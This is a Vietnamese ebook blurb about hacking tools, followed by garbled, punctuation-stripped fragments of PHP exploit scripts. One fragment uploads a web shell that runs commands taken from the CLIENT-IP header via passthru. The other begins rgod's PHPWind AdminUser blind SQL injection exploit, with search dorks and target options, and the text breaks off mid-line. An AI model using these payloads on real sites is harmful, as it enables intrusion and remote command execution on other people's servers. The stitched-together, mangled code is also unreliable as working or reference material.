Ebook giới thiệu các công cụ và đồ nghề cần thiết cho việc Hack-Security. Ebook gồm có 1177 bài viết trong 28 chủ đề chính Phần 42: 10 part gồm Learning Windows, Learning Unix – Linux. | but I prefer posts because we do not have an .htaccess in blogs posts folder string is appended to a new post filename shell script language php error_reporting 0 set_time_limit 0 echo my_delim passthru _SERVER HTTP_CLIENT_IP echo my_delim script data ----------------------7d61bcd1f033e Content-Disposition form-data name f suntzu_ . v. ----------------------7d61bcd1f033e Content-Disposition form-data name newmessage . shell. ----------------------7d61bcd1f033e Content-Disposition form-data name newusername 1 ----------------------7d61bcd1f033e Content-Disposition form-data name adminuser 1 ----------------------7d61bcd1f033e Content-Disposition form-data name permission 1 ----------------------7d61bcd1f033e-- packet - POST . p. HTTP r n packet. Content-Type multipart form-data boundary---------------------- 7d61bcd1f033e r n packet. Host . host. r n packet. Content-Length . strlen data . r n packet. Connection close r n r n packet. data sendpacketii packet sleep 2 packet GET . p. blogs posts suntzu_ . v. HTTP r n packet. CLIENT-IP . cmd. r n packet. Host . host. r n packet. Connection close r n r n sendpacketii packet if eregi my_delim html temp explode my_delim html echo temp 1 else echo exploit failed. black_hat_cr HCE PHPWind AdminUser Remote Blind SQL Injection Exploit Code php print_r PHPWind AdminUser blind SQL injection exploit by rgod retrog@ site http dorks powered by phpwind powered by phpwind -site if argc 3 print_r Usage php . argv 0 . host path OPTIONS host target server ip hostname path path to phpwind Options -p port specify a port other than 80 -P ip port specify a proxy -t n adjust query timeout default 10 -b n adjust the delay for benchmark -e key specify an encryption key if you have it it is an md5 fragment 18 chars Example php . argv 0 . localhost phpwind 80 php . argv 0 . localhost -p81 php . argv 0 . localhost forum -t15 -b20000000 php . argv